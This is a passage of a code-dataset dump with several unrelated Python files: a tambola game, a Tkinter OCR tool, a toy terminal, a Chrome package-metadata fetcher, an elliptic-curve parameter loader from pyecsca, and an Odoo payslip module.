exps[id](args.rand_seed)\n","sub_path":"exp.py","file_name":"exp.py","file_ext":"py","file_size_in_byte":16462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"493293090","text":"\n\nfrom xai.brain.wordbase.nouns._reflex import _REFLEX\n\n#calss header\nclass _REFLEXES(_REFLEX, ):\n\tdef __init__(self,): \n\t\t_REFLEX.__init__(self)\n\t\tself.name = \"REFLEXES\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"reflex\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_reflexes.py","file_name":"_reflexes.py","file_ext":"py","file_size_in_byte":240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"366910357","text":"import random\r\nimport time\r\ndef game():\r\n t1 = [1, 11, 21, 31, 41, 51, 61, 71, 81]\r\n t2 = [2, 12, 22, 32, 42, 52, 62, 72, 82]\r\n t3 = [3, 13, 23, 33, 43, 53, 63, 73, 83]\r\n t4 = [4, 14, 24, 34, 44, 54, 64, 74, 84]\r\n t5 = [5, 15, 25, 35, 45, 55, 65, 75, 85]\r\n t6 = [6, 16, 26, 36, 46, 56, 66, 76, 86]\r\n t7 = [7, 17, 27, 37, 47, 57, 67, 77, 87]\r\n t8 = [8, 18, 28, 38, 48, 58, 68, 78, 88]\r\n t9 = [9, 19, 29, 39, 49, 59, 69, 79, 89]\r\n tables = [t1, t2, t3, t4, t5, t6, t7, t8, t9]\r\n\r\n players = int(input(\"\\nEnter the no of players(min 2 players):\"))\r\n n = 0\r\n if(players == 1):\r\n print(\"Sorry !!! 1 player can't play this game\\n\")\r\n game()\r\n else:\r\n while n < players and players < 11:\r\n random.shuffle(t1)\r\n random.shuffle(t2)\r\n random.shuffle(t3)\r\n random.shuffle(t4)\r\n random.shuffle(t5)\r\n random.shuffle(t6)\r\n random.shuffle(t7)\r\n random.shuffle(t8)\r\n random.shuffle(t9)\r\n random.shuffle(tables)\r\n print(\"User\",n+1,\":\", tables[n])\r\n n = n+1\r\n print()\r\n\r\n \r\n print(\"Plz note down the tables\")\r\n ch = str(input(\"\\nShall we start the game:(Y|N)\"))\r\n\r\n if( ch == 'Y' or ch == 'y'):\r\n i = 1\r\n j = 1\r\n while(j < players+1):\r\n while(i < 10 * players+1):\r\n print(\"User:\")\r\n j = j + 1\r\n print(random.randint(1,91),\"\\n\")\r\n time.sleep(1)\r\n i = i + 1\r\n print()\r\n \r\n j = j+1\r\n winner = str(input(\"Enter the winner:\"))\r\n print(\"*****Congrats\",winner,\"****\")\r\n else:\r\n print(\"Ok Bye\")\r\n \r\ngame()\r\n\r\nch = str(input(\"Do u want to play again(Y|N):\"))\r\nif(ch == 'Y' or ch == 'y'):\r\n game()\r\nelse:\r\n print(\"thank you visit again\")\r\n\r\n\r\n\r\n\r\n#new\r\n\r\n \r\n \r\n","sub_path":"JARVIS/tambola.py","file_name":"tambola.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"215819666","text":"import os\r\nfrom subprocess import call\r\nimport subprocess\r\nimport sys\r\nfrom tkinter import *\r\nfrom tkinter import ttk\r\nfrom tkinter import filedialog, Text,messagebox\r\nimport time\r\nfrom PIL import Image\r\nimport pytesseract\r\n\r\npytesseract.pytesseract.tesseract_cmd = r'Tesseract-OCR\\tesseract.exe'\r\n\r\nclass ConversionGui:\r\n def __init__(self):\r\n def click_Main():\r\n Gui1.destroy() \r\n call([ r\"Main.exe\"]) \r\n def click_capture(): \r\n call([\"python\", \"webcam.py\"]) \r\n def center_window(w=300, h=200):\r\n # get screen width and height\r\n ws = Gui1.winfo_screenwidth()\r\n hs = Gui1.winfo_screenheight()\r\n # calculate position x, y\r\n x = (ws/2) - (w/2) \r\n y = (hs/2) - (h/2)\r\n Gui1.geometry('%dx%d+%d+%d' % (w, h, x, y))\r\n\r\n def get_file():\r\n filename=filedialog.askopenfilename(initialdir=\"/Retry number2/\",title=\"Select File\",\r\n filetypes=((\"jpeg files\",\"*.jpg\"),(\"PNG Files\", \"*.png\"),(\"all files\", \"*.*\")))\r\n language=self.comboExample.get()\r\n \r\n if language == 'Afrikaans':\r\n abbr='afr'\r\n if language == 'Amharic':\r\n abbr='amh'\r\n if language == 'Arabic':\r\n abbr='ara'\r\n if language == 'Assamese':\r\n abbr='asm'\r\n if language == 'Azerbaijani':\r\n abbr='aze'\r\n if language == 'Cyrilic':\r\n abbr='aze_cyrl'\r\n if language == 'Belarusian':\r\n abbr='bel'\r\n if language == 'Bengali':\r\n abbr='ben'\r\n if language == 'Tibetan':\r\n abbr='tib'\r\n if language == 'Bosnian':\r\n abbr='bos'\r\n if language == 'Breton':\r\n abbr='bre'\r\n if language == 'Catalan':\r\n abbr='cat'\r\n if language == 'Cebuano':\r\n abbr='ceb'\r\n if language == 'Czech':\r\n abbr='ces'\r\n if language == 'Chinese simplified':\r\n abbr='chi_sim'\r\n if language == 'Chinese traditional':\r\n abbr='chi_tra'\r\n if language == 'Cherokee':\r\n abbr='chr'\r\n if language == 'Welsh':\r\n abbr='cym '\r\n if language == 'Danish':\r\n abbr='dan'\r\n if language == 'German':\r\n abbr='deu'\r\n if language == 'Dzongkha':\r\n abbr='dzo'\r\n if language == 'Greek':\r\n abbr='ell'\r\n if language == 'English':\r\n abbr='eng'\r\n if language == 'Esperanto':\r\n abbr='epo'\r\n if language == 'Persian':\r\n abbr='fas'\r\n if language == 'Finnish':\r\n abbr='fas'\r\n if language == 'Hebrew':\r\n abbr='fin'\r\n if language == 'Japanese':\r\n abbr='jpn'\r\n if language == 'Kurdish':\r\n abbr='kur'\r\n if language == 'Russian':\r\n abbr='rus'\r\n if language == 'Serbian':\r\n abbr='srp'\r\n if language == 'Swedish':\r\n abbr='swe'\r\n if language == 'Tagalog':\r\n abbr='tgl'\r\n if language == 'French':\r\n abbr='fra'\r\n if language == 'Hindi':\r\n abbr='hin'\r\n if language == 'Bulgarian':\r\n abbr='bre'\r\n if language == 'Korean':\r\n abbr='kor'\r\n #ocrstring = pytesseract.image_to_string(Image.open(filename), lang= abbr)\r\n try:\r\n # print(\"Processing\")\r\n ocrstring = pytesseract.image_to_string(Image.open(filename), lang= abbr)\r\n '''\r\n try:\r\n temp = open(\"temp.txt\", \"w\")\r\n temp.write(ocrstring)\r\n temp.close()\r\n except:'''\r\n temp = open(\"temp.txt\",\"w\", encoding='utf-8')\r\n temp.write(ocrstring)\r\n temp.close()\r\n Gui1.destroy()\r\n call([\"python\", \"Process.py\"])\r\n except:\r\n \r\n messagebox.showinfo(\"Warning!\", \"Processing Failed (Wrong file/datatype)\")\r\n\r\n Gui1 = Tk()\r\n helv = \"Helvetica\", 18,\"bold\"\r\n titlefont = \"Helvetica\", 22,\"bold\"\r\n center_window(400, 600) \r\n Gui1.title(\"Optical Character Recognition\")\r\n Gui1.configure(background=\"#121212\")\r\n Gui1.configure(highlightbackground=\"#d9d9d9\")\r\n Gui1.configure(highlightcolor=\"black\", borderwidth= 10, relief=RIDGE)\r\n Gui1.resizable(FALSE,FALSE)\r\n #Gui1.overrideredirect(TRUE)\r\n\r\n self.Frame1 = Frame(Gui1)\r\n self.Frame1.place(relx=0.02, rely=0.03, relheight=0.94, relwidth=0.96)\r\n self.Frame1.configure(relief=RIDGE,borderwidth=\"2\",background=\"#3d3d3d\",highlightbackground=\"#d9d9d9\",highlightcolor=\"black\")\r\n\r\n \r\n\r\n self.title = Label(self.Frame1)\r\n self.title.place(relx=0.08, rely=0.03, height=103, width=300)\r\n self.title.configure(background=\"#3d3d3d\",foreground=\"white\", text=\"Pick your choices\", font=titlefont)\r\n\r\n self.comboExample = ttk.Combobox(self.Frame1, values=[\r\n \"Afrikaans\", \"Amharic\",\"Arabic\",\"Assamese\",\"Azerbaijani\",\"Cyrilic\",\"Belarusian\",\"Bengali\",\"Tibetan\",\"Bosnian\",\"Breton\",\r\n \"Bulgarian\",\"Catalan\",\"Cebuano\",\"Czech\",\"Chinese simplified\",\"Chinese traditional\",\"Cherokee\",\"Welsh\",\"Danish\",\"German\",\r\n \"Dzongkha\",\"Greek\",\"English\",\"Esperanto\",\"Persian\",\"Finnish\",\"French\",\"Hebrew\",\"Hindi\",\"Japanese\",\"Kurdish Kurmanji\",\"Korean\",\r\n \"Russian\",\"Serbian\",\"Swedish\",\"Tagalog\"\r\n ]) \r\n self.comboExample.place(relx=0.30, rely=0.18, height=30, width=150)\r\n self.comboExample.set('English')\r\n\r\n #print(self.comboExample.get())\r\n self.Button1 = Button(self.Frame1)\r\n self.Button1.place(relx=0.12, rely=0.26, height=103, width=266)\r\n self.Button1.configure(relief=RIDGE,activebackground=\"#d9d9d9\",font=helv,background=\"#121212\",foreground=\"#ffffff\",highlightbackground=\"#d9d9d9\",highlightcolor=\"black\")\r\n self.Button1.configure(text='''Select Image''')\r\n self.Button1.configure(command = get_file)\r\n\r\n self.Button2 = Button(self.Frame1)\r\n self.Button2.place(relx=0.12, rely=0.47, height=103, width=266)\r\n self.Button2.configure(relief=RIDGE,activebackground=\"#d9d9d9\",font=helv,background=\"#121212\",foreground=\"#ffffff\",highlightbackground=\"#d9d9d9\",highlightcolor=\"black\")\r\n self.Button2.configure(text='''Capture''')\r\n self.Button2.configure(command = click_capture)\r\n\r\n self.Button3 = Button(self.Frame1)\r\n self.Button3.place(relx=0.12, rely=0.68, height=103, width=266)\r\n self.Button3.configure(relief=RIDGE,activebackground=\"#d9d9d9\",font=helv,background=\"#121212\",foreground=\"#ffffff\",highlightbackground=\"#d9d9d9\",highlightcolor=\"black\")\r\n self.Button3.configure(command = click_Main)\r\n self.Button3.configure(text='''Back''')\r\n\r\n Gui1.mainloop()\r\nif __name__ == '__main__':\r\n Gui=ConversionGui()","sub_path":"Conversion.py","file_name":"Conversion.py","file_ext":"py","file_size_in_byte":7367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"9340861","text":"#!/bin/python\n\nimport time\n\ncommands = {'test':'This is a test', 'check':'This is a check'}\n\nwhile True:\n gmtime = time.gmtime()\n prompt = str(gmtime.tm_year) + str(gmtime.tm_mon) + str(gmtime.tm_mday)\n inp = input(prompt+'>')\n\n if inp == 'exit':\n exit(0)\n else:\n if inp.strip() in commands.keys():\n print(commands[inp])\n else:\n print('Command not found')\n","sub_path":"simulateTerminal.py","file_name":"simulateTerminal.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"594215620","text":"# coding: utf-8\n# flake8: noqa\ntry: # py3\n from urllib import request\n from urllib.request import urlopen\n import configparser\n import gzip\nexcept: # py2\n import requests as request\n from urllib import urlopen\n import ConfigParser as configparser\n import zlib as gzip\n import StringIO\nimport xml.etree.ElementTree as tree\nimport random\nimport time\n# import ssl\nimport re\n\n\ndef get(url, data=None, method='GET', timeout=200):\n ''' 获取数据\n return str '''\n ualist = [\n 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36',\n 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36'\n ]\n header = {'Accept-Encoding': 'gzip'}\n header['User-Agent'] = random.choice(ualist)\n\n req = request.Request(method=method, url=url, data=data, headers=header)\n # req.set_proxy('127.0.0.1:8118', 'https')\n # context = ssl._create_unverified_context()\n try: # py2\n s = request.Session()\n resp = s.send(req.prepare())\n page = resp.content\n except: # py3\n page = urlopen(req).read()\n\n try:\n return gzip.decompress(page, 16+gzip.MAX_WBITS).decode()\n except AttributeError:\n return gzip.decompress(page).decode()\n except OSError:\n return page\n except:\n return page\n\n\ndef post(os, branch, arch):\n ''' 返回 POST 数据\n return bytes '''\n vers = '6.3' if os == 'win' else '46.0.2490.86'\n key = os + '_' + branch\n\n # Windows - {GUID}; Mac - bundle ID (com.google.appname)\n appid = {\n 'win_stable': '{4DC8B4CA-1BDA-483E-B5FA-D3C12E15B62D}',\n 'win_beta' : '{4DC8B4CA-1BDA-483E-B5FA-D3C12E15B62D}',\n 'win_dev' : '{4DC8B4CA-1BDA-483E-B5FA-D3C12E15B62D}',\n 'win_canary': '{4EA16AC7-FD5A-47C3-875B-DBF4A2008C20}',\n 'mac_stable': 'com.google.Chrome',\n 'mac_beta' : 'com.google.Chrome',\n 'mac_dev' : 'com.google.Chrome',\n 'mac_canary': 'com.google.Chrome.Canary'\n }\n ap = {\n 'win_stable': {'x86':'-multi-chrome', 'x64':'x64-stable-multi-chrome'},\n 'win_beta' : {'x86':'1.1-beta', 'x64':'x64-beta-multi-chrome'},\n 'win_dev' : {'x86':'2.0-dev', 'x64':'x64-dev-multi-chrome'},\n 'win_canary': {'x86':'', 'x64':'x64-canary'},\n 'mac_stable': {'x86':'', 'x64':''},\n 'mac_beta' : {'x86':'betachannel', 'x64':'betachannel'},\n 'mac_dev' : {'x86':'devchannel', 'x64':'devchannel'},\n 'mac_canary': {'x86':'', 'x64':''}\n }\n data = '''\n\n \n \n \n \n \n \n'''.format(os, vers, appid[key], ap[key][arch])\n return data.encode()\n\n\ndef xml_decode(xmls, os=None, branch=None, arch=None):\n ''' 解析 XML\n return Dict '''\n os_type = {'win': 'exe', 'mac': 'dmg'}\n fzug_url = 'https://repo.fdzh.org/chrome/%s/' % os_type[os]\n\n root = tree.fromstring(xmls)\n manifest_node = root.find('.//manifest')\n manifest_version = manifest_node.get('version')\n\n pkg_node = root.find('.//package')\n pkg_name = pkg_node.get('name')\n pkg_size = pkg_node.get('size')\n pkg_hash = pkg_node.get('hash_sha256')\n\n url_nodes = root.findall('.//url')\n urls = []\n for node in url_nodes:\n urls.append(node.get('codebase') + pkg_name)\n if arch == 'x64' and os == 'win':\n pkg_name = pkg_name.replace('.exe', '_win64.exe')\n urls.append(fzug_url + pkg_name)\n\n return {\n 'timestamp': str(time.time()).split('.')[0],\n 'os': os,\n 'arch': arch,\n 'channel': branch,\n 'name': pkg_name,\n 'version': manifest_version,\n 'size': pkg_size,\n 'sha256': pkg_hash,\n 'urls': urls\n }\n\n\ndef get_rpm_info(branch):\n arch = 'x86_64'\n url = 'https://dl.google.com/linux/chrome/rpm/stable/'\n fzug_url = 'https://repo.fdzh.org/chrome/rpm/'\n pkgname = {\n 'stable': 'google-chrome-stable',\n 'beta': 'google-chrome-beta',\n 'dev': 'google-chrome-unstable'\n }\n metafile = ['repomd.xml', 'primary.xml.gz',\n 'filelists.xml.gz', 'other.xml.gz']\n\n meta_xml = get(url + arch + '/repodata/' + metafile[1])\n metas = re.findall('', meta_xml, re.S)\n pattern = '.*ver=\"(.+?)\".*>(.{40})<.*file=\"(.+?)\".*package=\"(.+?)\".*href=\"(.+)\"'\n for meta in metas:\n pkg_info = re.match('.*' + pkgname[branch] + pattern, meta, re.S)\n if pkg_info:\n break\n pkg_uri = arch + '/' + pkg_info.group(5)\n\n return {\n 'timestamp': pkg_info.group(3),\n 'os': 'linux',\n 'arch': arch,\n 'channel': branch,\n 'name': pkg_info.group(5),\n 'version': pkg_info.group(1),\n 'size': pkg_info.group(4),\n 'sha256': pkg_info.group(2),\n 'urls': [url + pkg_uri, fzug_url + pkg_uri]\n }\n\n\ndef get_deb_info(branch):\n arch = 'amd64'\n url = 'https://dl.google.com/linux/chrome/deb/'\n fzug_url = 'https://repo.fdzh.org/chrome/deb/'\n pkgname = {\n 'stable': 'google-chrome-stable',\n 'beta': 'google-chrome-beta',\n 'dev': 'google-chrome-unstable'\n }\n metafile = 'Packages.gz'\n\n meta_inf = get(url + 'dists/stable/main/binary-amd64/' + metafile)\n for i in ['stable', 'beta', 'dev']:\n off = meta_inf.find(pkgname[i])\n meta_inf = meta_inf[:off-9] + '[%s]\\n' % i + meta_inf[off-9:]\n config = configparser.ConfigParser()\n try: # py3\n config.read_string(meta_inf)\n except AttributeError: # py2\n config.readfp(StringIO.StringIO(meta_inf))\n pkg_uri = config.get(branch, 'Filename')\n pkg_name = '{}_{}_{}.deb'.format(\n config.get(branch, 'Package'),\n config.get(branch, 'Version'),\n arch\n )\n\n return {\n 'timestamp': str(time.time()).split('.')[0],\n 'os': 'linux',\n 'arch': arch,\n 'channel': branch,\n 'name': pkg_name,\n 'version': config.get(branch, 'Version')[:-2],\n 'size': config.get(branch, 'Size'),\n 'sha256': config.get(branch, 'SHA256'),\n 'urls': [url + pkg_uri, fzug_url + pkg_uri]\n }\n\n\ndef get_pkg_info(platform, branch, arch):\n api_url = 'https://tools.google.com/service/update2'\n result = []\n for i in platform:\n for j in branch:\n if i == 'linux' and j == 'canary':\n continue\n for k in arch:\n if i in ['mac', 'linux'] and k == 'x64':\n continue\n if i == 'linux':\n # Get rpm and deb metadata\n data = get_rpm_info(j)\n result.append(data)\n data = get_deb_info(j)\n else:\n # Get exe and dmg metadata\n resp = get(api_url, post(i, j, k), method='POST')\n data = xml_decode(resp, i, j, k)\n result.append(data)\n return result\n","sub_path":"app/chrome.py","file_name":"chrome.py","file_ext":"py","file_size_in_byte":7393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"640915435","text":"import json\nfrom io import RawIOBase, BufferedIOBase\nfrom os.path import join\nfrom pathlib import Path\nfrom typing import Optional, Dict, Union, BinaryIO\n\nfrom pkg_resources import resource_listdir, resource_isdir, resource_stream\nfrom public import public\n\nfrom .coordinates import AffineCoordinateModel, CoordinateModel\nfrom .curve import EllipticCurve\nfrom .mod import Mod\nfrom .model import (CurveModel, ShortWeierstrassModel, MontgomeryModel, EdwardsModel,\n TwistedEdwardsModel)\nfrom .point import Point, InfinityPoint\n\n\n@public\nclass DomainParameters(object):\n \"\"\"Domain parameters which specify a subgroup on an elliptic curve.\"\"\"\n curve: EllipticCurve\n generator: Point\n order: int\n cofactor: int\n name: Optional[str]\n category: Optional[str]\n\n def __init__(self, curve: EllipticCurve, generator: Point, order: int,\n cofactor: int, name: Optional[str] = None, category: Optional[str] = None):\n self.curve = curve\n self.generator = generator\n self.order = order\n self.cofactor = cofactor\n self.name = name\n self.category = category\n\n def __eq__(self, other):\n if not isinstance(other, DomainParameters):\n return False\n return self.curve == other.curve and self.generator == other.generator and self.order == other.order and self.cofactor == other.cofactor\n\n def __get_name(self):\n if self.name and self.category:\n return f\"{self.category}/{self.name}\"\n elif self.name:\n return self.name\n elif self.category:\n return self.category\n return \"\"\n\n def __str__(self):\n name = self.__get_name()\n if not name:\n name = str(self.curve)\n return f\"{self.__class__.__name__}({name})\"\n\n def __repr__(self):\n return f\"{self.__class__.__name__}({self.curve!r}, {self.generator!r}, {self.order}, {self.cofactor})\"\n\n\ndef _create_params(curve, coords, infty):\n if curve[\"field\"][\"type\"] == \"Binary\":\n raise ValueError(\"Binary field curves are currently not supported.\")\n if curve[\"field\"][\"type\"] == \"Extension\":\n raise ValueError(\"Extension field curves are currently not supported.\")\n\n # Get model and param names\n model: CurveModel\n field = int(curve[\"field\"][\"p\"], 16)\n order = int(curve[\"order\"], 16)\n cofactor = int(curve[\"cofactor\"], 16)\n if curve[\"form\"] == \"Weierstrass\":\n model = ShortWeierstrassModel()\n param_names = [\"a\", \"b\"]\n elif curve[\"form\"] == \"Montgomery\":\n model = MontgomeryModel()\n param_names = [\"a\", \"b\"]\n elif curve[\"form\"] == \"Edwards\":\n model = EdwardsModel()\n param_names = [\"c\", \"d\"]\n elif curve[\"form\"] == \"TwistedEdwards\":\n model = TwistedEdwardsModel()\n param_names = [\"a\", \"d\"]\n else:\n raise ValueError(\"Unknown curve model.\")\n params = {name: Mod(int(curve[\"params\"][name][\"raw\"], 16), field) for name in param_names}\n\n # Check coordinate model name and assumptions\n coord_model: CoordinateModel\n if coords == \"affine\":\n coord_model = AffineCoordinateModel(model)\n else:\n if coords not in model.coordinates:\n raise ValueError(\"Coordinate model not supported for curve.\")\n coord_model = model.coordinates[coords]\n for assumption in coord_model.assumptions:\n alocals: Dict[str, Union[Mod, int]] = {}\n compiled = compile(assumption, \"\", mode=\"exec\")\n exec(compiled, None, alocals)\n for param, value in alocals.items():\n if params[param] != value:\n raise ValueError(\n f\"Coordinate model {coord_model} has an unsatisifed assumption on the {param} parameter (= {value}).\")\n\n # Construct the point at infinity\n infinity: Point\n if infty:\n infinity = InfinityPoint(coord_model)\n else:\n ilocals: Dict[str, Union[Mod, int]] = {**params}\n for line in coord_model.neutral:\n compiled = compile(line, \"\", mode=\"exec\")\n exec(compiled, None, ilocals)\n infinity_coords = {}\n for coordinate in coord_model.variables:\n if coordinate not in ilocals:\n raise ValueError(f\"Coordinate model {coord_model} requires infty option.\")\n value = ilocals[coordinate]\n if isinstance(value, int):\n value = Mod(value, field)\n infinity_coords[coordinate] = value\n infinity = Point(coord_model, **infinity_coords)\n elliptic_curve = EllipticCurve(model, coord_model, field, infinity, params) # type: ignore[arg-type]\n affine = Point(AffineCoordinateModel(model),\n x=Mod(int(curve[\"generator\"][\"x\"][\"raw\"], 16), field),\n y=Mod(int(curve[\"generator\"][\"y\"][\"raw\"], 16), field))\n if not isinstance(coord_model, AffineCoordinateModel):\n generator = affine.to_model(coord_model, elliptic_curve)\n else:\n generator = affine\n return DomainParameters(elliptic_curve, generator, order, cofactor, curve[\"name\"], curve[\"category\"])\n\n\n@public\ndef load_params(file: Union[str, Path, BinaryIO], coords: str, infty: bool = True) -> DomainParameters:\n \"\"\"\n\n :param input:\n :param coords: The name of the coordinate system to use.\n :param infty: Whether to use the special :py:class:InfinityPoint (`True`) or try to use the\n point at infinity of the coordinate system.\n :return: The curve.\n \"\"\"\n curve = None\n if isinstance(file, (str, Path)):\n with open(file, \"rb\") as f:\n curve = json.load(f)\n elif isinstance(file, (RawIOBase, BufferedIOBase, BinaryIO)):\n curve = json.load(file)\n if curve[\"field\"][\"type\"] == \"Binary\":\n raise ValueError(\"Binary field curves are currently not supported.\")\n if curve[\"field\"][\"type\"] == \"Extension\":\n raise ValueError(\"Extension field curves are currently not supported.\")\n\n return _create_params(curve, coords, infty)\n\n\n@public\ndef get_params(category: str, name: str, coords: str, infty: bool = True) -> DomainParameters:\n \"\"\"\n Retrieve a curve from a set of stored parameters. Uses the std-curves database at\n https://github.com/J08nY/std-curves.\n\n :param category: The category of the curve.\n :param name: The name of the curve.\n :param coords: The name of the coordinate system to use.\n :param infty: Whether to use the special :py:class:InfinityPoint (`True`) or try to use the\n point at infinity of the coordinate system.\n :return: The curve.\n \"\"\"\n listing = resource_listdir(__name__, \"std\")\n categories = list(entry for entry in listing if resource_isdir(__name__, join(\"std\", entry)))\n if category not in categories:\n raise ValueError(\"Category {} not found.\".format(category))\n json_path = join(\"std\", category, \"curves.json\")\n with resource_stream(__name__, json_path) as f:\n category_json = json.load(f)\n for curve in category_json[\"curves\"]:\n if curve[\"name\"] == name:\n break\n else:\n raise ValueError(\"Curve {} not found in category {}.\".format(name, category))\n\n return _create_params(curve, coords, infty)\n","sub_path":"pyecsca/ec/params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":7245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"168731014","text":"from odoo.fields import Datetime\n\nfrom odoo import api, fields, models\n\n\nclass HrPayslip(models.Model):\n _inherit = 'hr.payslip'\n\n brutto = fields.Float(readonly=True, store=True)\n netto = fields.Float(readonly=True, store=True)\n pph21_amount = fields.Float(readonly=True, store=True)\n pph21_paid = fields.Float(readonly=True, store=True)\n # transfer_request_id_payslip = fields.One2many('bank.transfer.request.payroll', 'transfer_id_payslip', string='Transfer Request ID')\n transfer_request_id_payslips = fields.Many2one('bank.transfer.request.payroll', 'Transfer Request ID')\n nik_npwp_name = fields.Char(compute='get_nik_npwp_name', store=True)\n nik = fields.Char(related='employee_id.employee_id', store=True)\n npwp = fields.Char(related='employee_id.npwp_no', store=True)\n department = fields.Char(related='employee_id.department_id.name', store=True)\n\n @api.multi\n def get_nik_npwp_name(self):\n for line in self:\n if line.employee_id.employee_id:\n line.nik_npwp_name = \"{nik}{strip1}{npwp}{strip2}{name}\".format(nik=line.employee_id.employee_id, strip1=' - ',\n npwp=line.employee_id.npwp_no, strip2=' - ',\n name=line.employee_id.name)\n else:\n line.nik_npwp_name = \"\"\n\n @api.multi\n def action_payslip_cancel(self):\n for payslip in self:\n if payslip.move_id.journal_id.update_posted:\n payslip.move_id.button_cancel()\n payslip.move_id.unlink()\n else:\n payslip.move_id.reverse_moves()\n payslip.move_id = False\n\n return self.write({'state': 'cancel'})\n\n @api.multi\n def compute_sheet(self):\n result = super(HrPayslip, self).compute_sheet()\n\n for payslip in self:\n brutto = payslip.line_ids.filtered(lambda r: r.code == 'GROSSTAX').total\n netto = payslip.line_ids.filtered(lambda r: r.code == 'NET').total\n pph21_amount = payslip.line_ids.filtered(lambda r: r.code == 'PPH21_TOTAL').total\n payslip.write(\n {'brutto': brutto, 'netto': netto, 'pph21_amount': pph21_amount})\n # for line in payslip.line_ids:\n # rule = self.env['hr.salary.rule'].search([('id', '=', line.salary_rule_id.id)])\n # line.write(\n # {'is_taxed': rule.is_taxed,\n # 'type_id': rule.type_id,\n # 'tax_class_id': rule.tax_class_id}\n # )\n\n return result\n\n def _sum_salary_rule_category(self, localdict, category, amount):\n if category.parent_id:\n localdict = self._sum_salary_rule_category(localdict, category.parent_id, amount)\n localdict['categories'].dict[category.code] = category.code in localdict['categories'].dict and \\\n localdict['categories'].dict[category.code] + amount or amount\n return localdict\n\n @api.model\n def _get_payslip_lines(self, contract_ids, payslip_id):\n # Override all code, care.. no super, all code must be defined here\n\n # we keep a dict with the result because a value can be overwritten by another rule with the same code\n result_dict = {}\n rules_dict = {'list_rules': []}\n worked_days_dict = {}\n inputs_dict = {}\n blacklist = []\n payslip = self.env['hr.payslip'].browse(payslip_id)\n for worked_days_line in payslip.worked_days_line_ids:\n worked_days_dict[worked_days_line.code] = worked_days_line\n for input_line in payslip.input_line_ids:\n inputs_dict[input_line.code] = input_line\n\n categories = BrowsableObject(payslip.employee_id.id, {}, self.env)\n inputs = InputLine(payslip.employee_id.id, inputs_dict, self.env)\n worked_days = WorkedDays(payslip.employee_id.id, worked_days_dict, self.env)\n payslips = Payslips(payslip.employee_id.id, payslip, self.env)\n rules = BrowsableObject(payslip.employee_id.id, rules_dict, self.env)\n\n baselocaldict = {\n 'categories': categories,\n 'rules': rules,\n 'payslip': payslips,\n 'worked_days': worked_days,\n 'inputs': inputs}\n # get the ids of the structures on the contracts and their parent id as well\n contracts = self.env['hr.contract'].browse(contract_ids)\n if len(contracts) == 1 and payslip.struct_id:\n structure_ids = list(set(payslip.struct_id._get_parent_structure().ids))\n else:\n structure_ids = contracts.get_all_structures()\n # get the rules of the structure and thier children\n rule_ids = self.env['hr.payroll.structure'].browse(structure_ids).get_all_rules()\n # run the rules by sequence\n sorted_rule_ids = [id for id, sequence in sorted(rule_ids, key=lambda x: x[1])]\n sorted_rules = self.env['hr.salary.rule'].browse(sorted_rule_ids)\n\n for contract in contracts:\n employee = contract.employee_id\n # variables that available in python code\n localdict = dict(baselocaldict, employee=employee, contract=contract, lines=[])\n\n for rule in sorted_rules:\n key = rule.code + '-' + str(contract.id)\n localdict['result'] = None\n localdict['result_qty'] = 1.0\n localdict['result_rate'] = 100\n # check if the rule can be applied\n if rule._satisfy_condition(localdict) and rule.id not in blacklist:\n # compute the amount of the rule\n amount, qty, rate = rule._compute_rule(localdict)\n # check if there is already a rule computed with that code\n previous_amount = rule.code in localdict and localdict[rule.code] or 0.0\n # set/overwrite the amount computed for this rule in the localdict\n tot_rule = amount * qty * rate / 100.0\n localdict[rule.code] = tot_rule\n rules_dict[rule.code] = rule\n\n # sum the amount for its salary category\n localdict = self._sum_salary_rule_category(localdict, rule.category_id, tot_rule - previous_amount)\n # create/overwrite the rule in the temporary results\n result_dict[key] = {\n 'salary_rule_id': rule.id,\n 'contract_id': contract.id,\n 'name': rule.name,\n 'code': rule.code,\n 'category_id': rule.category_id.id,\n 'sequence': rule.sequence,\n 'appears_on_payslip': rule.appears_on_payslip,\n 'condition_select': rule.condition_select,\n 'condition_python': rule.condition_python,\n 'condition_range': rule.condition_range,\n 'condition_range_min': rule.condition_range_min,\n 'condition_range_max': rule.condition_range_max,\n 'amount_select': rule.amount_select,\n 'amount_fix': rule.amount_fix,\n 'amount_python_compute': rule.amount_python_compute,\n 'amount_percentage': rule.amount_percentage,\n 'amount_percentage_base': rule.amount_percentage_base,\n 'register_id': rule.register_id.id,\n 'amount': amount,\n 'employee_id': contract.employee_id.id,\n 'quantity': qty,\n 'rate': rate,\n }\n current_line = BrowsableObject(\n employee,\n dict_object=dict(result_dict[key], rule=rule, total_per_line=tot_rule),\n env=self.env)\n localdict['lines'].append(current_line)\n result_dict[key] = self.finalize_payslip_line(\n result_dict[key], rule, total_per_line=tot_rule)\n else:\n # blacklist this rule and its children\n blacklist += [id for id, seq in rule._recursive_search_of_rules()]\n\n return list(result_dict.values())\n\n @api.model\n def finalize_payslip_line(self, line_dict, rule, total_per_line):\n # write code to change/manipulate current payslip line\n line_dict.update({\n 'is_taxed': rule.is_taxed,\n 'type_id': rule.type_id,\n 'tax_class_id': rule.tax_class_id\n })\n return line_dict\n\n @api.model\n def get_amount_by_tax(self, lines, is_taxed=True, tax_class_id='R', type_id='FIXED', category_code=False):\n total = 0\n for line in lines:\n if (line.rule.is_taxed == is_taxed and\n (not tax_class_id or 